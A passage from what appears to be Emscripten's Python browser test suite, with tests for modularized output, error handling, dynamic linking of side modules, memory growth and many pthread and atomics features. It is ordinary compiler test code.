if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = path_from_root('tests', 'browser_test_hello_world.c')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = path_from_root('tests', 'browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_test_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), 0, args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_test_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_test_file('side1.c', r'''
int side1() { return 1; }
''')
create_test_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), '3',
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_c11_threads.c'),
expected='0',
force_c=True,
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(path_from_root('tests', 'unistd', 'io.c'), 0, args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(path_from_root('tests', 'pthread', 'test_pthread_dispatch_after_exit.c'), 0, args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
